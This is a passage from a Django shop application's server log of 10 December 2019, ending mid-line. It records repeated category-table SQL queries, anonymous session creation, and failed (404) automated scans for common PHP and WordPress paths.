"shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:04:00,009 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:04:00,011 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:04:00,013 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:04:00,015 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:04:00,017 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:04:00,020 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:04:00] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:04:03,774 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:04:03,779 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:04:03,781 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:04:03,783 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:04:03,786 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:04:03,788 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:04:03,790 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:04:03,792 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:04:03,794 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:04:03,796 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:04:03,799 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:04:03] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:04:05,736 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:04:05,742 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:04:05,745 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:04:05,748 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:04:05,750 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:04:05,753 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:04:05,755 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:04:05,757 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:04:05,759 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:04:05,763 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:04:05,766 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:04:05] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:04:07,426 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:04:07,435 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:04:07,439 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:04:07,443 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:04:07,447 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:04:07,450 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:04:07,452 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:04:07,454 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:04:07,457 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:04:07,459 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:04:07,464 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:04:07] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:04:09,411 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:04:09,416 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:04:09,418 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:04:09,420 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:04:09,423 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:04:09,426 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:04:09,430 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:04:09,434 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:04:09,437 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:04:09,441 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:04:09,444 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:04:09] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 13:05:02] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:06:10] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:14:35] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 13:20:10] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:28:44] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:33:47] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:40:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 13:40:08,119 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ywl2plz7g1r9su84who1xos0dnqzi3l2' LIMIT 1; args=('ywl2plz7g1r9su84who1xos0dnqzi3l2',) DEBUG 2019-12-10 13:40:08,122 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ywl2plz7g1r9su84who1xos0dnqzi3l2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T13:40:08.120493+00:00'::timestamptz); args=('ywl2plz7g1r9su84who1xos0dnqzi3l2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 13, 40, 8, 120493, tzinfo=)) [10/Dec/2019 13:40:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 13:41:20] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:42:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:49:30] "GET / HTTP/1.0" 302 0 [10/Dec/2019 13:54:32] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:00:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:10:24] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:15:27] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [10/Dec/2019 14:20:10] "GET /wp-login.php HTTP/1.0" 404 6631 [10/Dec/2019 14:20:30] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:29:47] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:34:50] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:36:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:39:53] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:44:55] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:49:58] "GET / HTTP/1.0" 302 0 [10/Dec/2019 14:55:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:00:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:15:09] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:25:04] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:30:07] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [10/Dec/2019 15:36:33] "GET /wp-login.php HTTP/1.0" 404 6631 [10/Dec/2019 15:38:48] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:43:51] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:48:54] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:51:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:53:56] "GET / HTTP/1.0" 302 0 [10/Dec/2019 15:58:59] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 16:12:30] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [10/Dec/2019 16:12:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=109 HTTP/1.0" 404 6705 Not Found: /newslist.asp [10/Dec/2019 16:12:34] "GET /newslist.asp?type=4&id=1296 HTTP/1.0" 404 6649 [10/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:25:13] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [10/Dec/2019 16:27:29] "GET /proxy.php HTTP/1.0" 404 6629 [10/Dec/2019 16:30:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:35:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:40:21] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:45:24] "GET / HTTP/1.0" 302 0 [10/Dec/2019 16:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 16:47:50,397 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hjmt2te7yiulcf9zseh8mgkzail78nl0' LIMIT 1; args=('hjmt2te7yiulcf9zseh8mgkzail78nl0',) DEBUG 2019-12-10 16:47:50,398 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hjmt2te7yiulcf9zseh8mgkzail78nl0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T16:47:50.397530+00:00'::timestamptz); args=('hjmt2te7yiulcf9zseh8mgkzail78nl0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 16, 47, 50, 397530, tzinfo=)) [10/Dec/2019 16:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 16:50:27] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [10/Dec/2019 16:50:59] "GET /wp-login.php HTTP/1.0" 404 6636 [10/Dec/2019 16:59:31] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:25:14] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:32:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:38:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:43:14] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:48:17] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 17:53:20] "GET / HTTP/1.0" 302 0 [10/Dec/2019 17:59:41] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:03:49] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 18:03:49] "GET /robots.txt HTTP/1.0" 404 6623 Not Found: /Adminb5512046/Login.php [10/Dec/2019 18:03:50] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6663 [10/Dec/2019 18:03:50] "GET / HTTP/1.0" 302 0 Not Found: /l.php [10/Dec/2019 18:03:50] "GET /l.php HTTP/1.0" 404 6608 Not Found: /phpinfo.php [10/Dec/2019 18:03:50] "GET /phpinfo.php HTTP/1.0" 404 6626 Not Found: /test.php [10/Dec/2019 18:03:50] "GET /test.php HTTP/1.0" 404 6617 Not Found: /index.php [10/Dec/2019 18:03:51] "POST /index.php HTTP/1.0" 404 6621 Not Found: /bbs.php [10/Dec/2019 18:03:51] "POST /bbs.php HTTP/1.0" 404 6615 Not Found: /forum.php [10/Dec/2019 18:03:51] "POST /forum.php 